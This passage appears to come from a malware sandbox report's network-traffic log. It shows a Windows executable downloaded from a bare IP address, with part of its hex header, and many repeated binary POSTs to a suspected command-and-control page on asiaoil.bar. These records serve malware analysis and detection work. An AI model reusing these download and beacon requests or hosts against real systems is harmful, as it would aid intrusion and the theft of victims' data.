              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Feb 2022 09:21:50 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Feb 2022 03:31:37 GMTETag: "480d4-5d7a1966fd8a9"Accept-Ranges: bytesContent-Length: 295124Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: GET /windowSSH/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:21:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B14QjzK93WN7FMCRwgPdBoL4GvyuLTCNzn128gIE66EmvAljQdFfNPOn5qPxQ8nApBsPYHTSjURn1ssUf9vIO%2F1OL2%2BdI5plkWkZzNc4H79V9rsVWKoyCfjhFO%2FkqQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4453c8e679137-FRAData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYIeoMifwVUCSlJ5xQ%2FPPGpv3kxeM8Le4fFZcBSBNQE%2F00nQuzz6hHD2E4yzDxCDvC4GoHGHI7XDrLhEy10sRiqxImrim07qG7zifuLYaSXjE11cVB6vD4NlHq2qFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4454fc86b917d-FRAData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lb9okY1H6vGjyVC1u7%2FrtI1IlQS%2BFDAUyP1p%2FRqqpdW3oHWuKdkbXEj1FlsGoYPfJTBdMWMce2JdGAcisXgmjvWPRjePl3xI2oQ%2BLjS4JVazUAB%2FtUVsenR8M%2BuUug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44555fbc890ee-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WGSy9RBpA4nwv8vPkiC6IlReHDy2beH0Xpr8Jw91%2BmfmRccN%2FYfWCgt%2Fb96BC2i38aPjRgJdSwh7RJOrlqreqeiX8LTLhluVlMMPLsLX%2BVqck485IQfR0ZCBs3Abjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4455ccab45c80-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
